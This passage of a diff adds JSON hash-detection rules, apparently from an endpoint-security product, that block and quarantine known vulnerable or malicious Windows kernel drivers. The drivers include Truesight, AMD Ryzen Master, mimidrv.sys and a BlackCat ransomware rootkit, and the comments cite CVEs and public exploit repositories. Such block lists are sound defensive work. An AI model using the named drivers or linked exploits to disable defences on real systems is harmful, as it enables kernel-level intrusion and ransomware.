+ "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "19167ee2-9e05-542d-8c61-3ca8a8fa470a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809417Z",
+ "creation_date": "2026-03-23T11:45:31.809420Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809428Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "25291720e0ee3eaa62c5aec72ec920e776e1255cc64a7010c6c62533e391fa40",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1918a1ed-2664-570e-8969-831b3df24d18",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970176Z",
+ "creation_date": "2026-03-23T11:45:29.970177Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970183Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f2e97fb72237dbbd8981d13a056dd3544c41d802efd129e1ea7e3f655de661b8",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "191bb992-58ad-5bde-9f2b-ff118d2c2f14",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808838Z",
+ "creation_date": "2026-03-23T11:45:31.808842Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808851Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "be14867535e637d30d5778b2a96b6e8d2631046ac34ac7c92fe9936d09c4e062",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "192674a3-134e-5844-a2d3-65f95cfaefb1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830807Z",
+ "creation_date": "2026-03-23T11:45:30.830809Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830814Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cbbe48826fae88adb74f5e7e77e1fbe192d9e0f05983d69565e54f9c846e9da3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "19365f62-ae05-5f88-a54c-9ea9c4e8940e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.836630Z",
+ "creation_date": "2026-03-23T11:45:30.836633Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.836638Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "08d844b1ef804e6f4ebe072ba9f57feba5a063b97f19625a4012bf83b2929ea0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "195ed128-e7a2-5ce9-8199-ec3d788c8c19",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153648Z",
+ "creation_date": "2026-03-23T11:45:31.153650Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153656Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "896b21cb5583cc9b0e32c490bf352dc6ffc2416edec79aeab0616829a13ccaa5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "19656c3f-d006-5dc2-ac09-d62816f75249",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975130Z",
+ "creation_date": "2026-03-23T11:45:29.975133Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975138Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9b1ac756e35f795dd91adbc841e78db23cb7165280f8d4a01df663128b66d194",
+ "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "196b6108-fa27-5bd9-8a45-4add3b144e47",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146692Z",
+ "creation_date": "2026-03-23T11:45:32.146694Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146699Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d51d00127ddd4551fb1eafe14255715014944ad4c60eabb9e568c3ff98ff4a2e",
+ "comment": "Vulnerable Kernel Driver (aka 8492937_2_Driver.sys) [https://www.loldrivers.io/drivers/c95a796a-a8f6-4cfa-bc42-4936ecb59091/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "19978ec1-6c20-5d2b-8a56-0e6291806ce2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.466937Z",
+ "creation_date": "2026-03-23T11:45:30.466940Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.466956Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b8d3914b796832a576ed0c977db439c8a5d6df5d0608088c39c786ff81bc2f11",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "19a714e6-3b01-53cc-ae78-1c5482addd53",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829708Z",
+ "creation_date": "2026-03-23T11:45:31.829711Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829719Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "560dbf29eb838763cbabcf378cd8e9f12b7b674df8bfbe7a299f1203c1b3e349",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "19b7adda-2c0f-5d0a-b70b-a908c47009e5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487649Z",
+ "creation_date": "2026-03-23T11:45:31.487651Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487657Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "df95701164a0c5725ff99af1bbd0871083c7139a7683f0753eddfd584d84ba79",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "19cbbf30-419d-5429-996b-d634f00387c8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141820Z",
+ "creation_date": "2026-03-23T11:45:31.141822Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141828Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6fa56c310f9214532d074abe3c37b73c483c16dc8680d0e16d5144e49c7ced03",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "19dbd962-119b-5630-8dc6-0985d81e6f9f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.473143Z",
+ "creation_date": "2026-03-23T11:45:31.473147Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.473156Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b32096444234a6473f797834b61cec443aab2acbffacf0f7dac842e3c7c10825",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "19e0fd82-c6d4-5cb2-ae3a-219f024b9428",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.603996Z",
+ "creation_date": "2026-03-23T11:45:29.603998Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604003Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d27af8f0bed1e4f4aeb2b20da89d0ffa1b7b5f7f14148cdf09e6444a0aa5bb1b",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "19ecd793-8d73-58f3-ae33-27d476eca21b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973965Z",
+ "creation_date": "2026-03-23T11:45:29.973967Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973972Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c082514317bf80a2f5129d84a5a55e411a95e32d03a4df1274537704c80e41dd",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "19f077e2-2173-555e-8e13-960e42e56206",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.468376Z",
+ "creation_date": "2026-03-23T11:45:30.468380Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.468390Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "68ea8d1bfabf37920686a0814c0bf47cbc4527543716fd94c0d3f23382e15081",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "19f498f3-b9a7-55ee-bf3b-556a5d4ed3e1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984034Z",
+ "creation_date": "2026-03-23T11:45:29.984036Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984042Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7049f3c939efe76a5556c2a2c04386db51daf61d56b679f4868bb0983c996ebb",
+ "comment": "Vulnerable Kernel Driver (aka SysInfo.sys) [https://www.loldrivers.io/drivers/84ccb68d-ce34-4aa2-98d5-7f473c2e1b07/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "19fce74c-69ac-5bd6-8630-2633f7db63fd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985467Z",
+ "creation_date": "2026-03-23T11:45:29.985469Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985474Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "24395b622d4fd48864a50978ffd2b82fdded5189741a6deea9293cc075cd0c6b",
+ "comment": "Malicious BlackCat/ALPHV Ransomware Rootkit (aka dkrTK.sys) [https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a08e9c2-aa2b-5a9f-b19b-932dbe08275a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487992Z",
+ "creation_date": "2026-03-23T11:45:31.487994Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487999Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a7b66aa27c75ae2109da03c276bedce8a1c9d978929587f219d435068bc6fdc5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a0928c2-bb7d-5d97-98aa-99427c11779e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159439Z",
+ "creation_date": "2026-03-23T11:45:31.159441Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159446Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9fcf57a17d44a6583153261a9c43211ad1d65a1f5ebda12cb1856629e774bdb9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a0b25fa-8131-54c0-b799-7c16ee00662f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492574Z",
+ "creation_date": "2026-03-23T11:45:31.492576Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492581Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "14d3a333327078aa265028c992293ac58655d8376c3e5110519fbaa079b2fc36",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1a0f9dbf-e318-5785-8cea-ce5820276cbd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617167Z",
+ "creation_date": "2026-03-23T11:45:29.617169Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617174Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5",
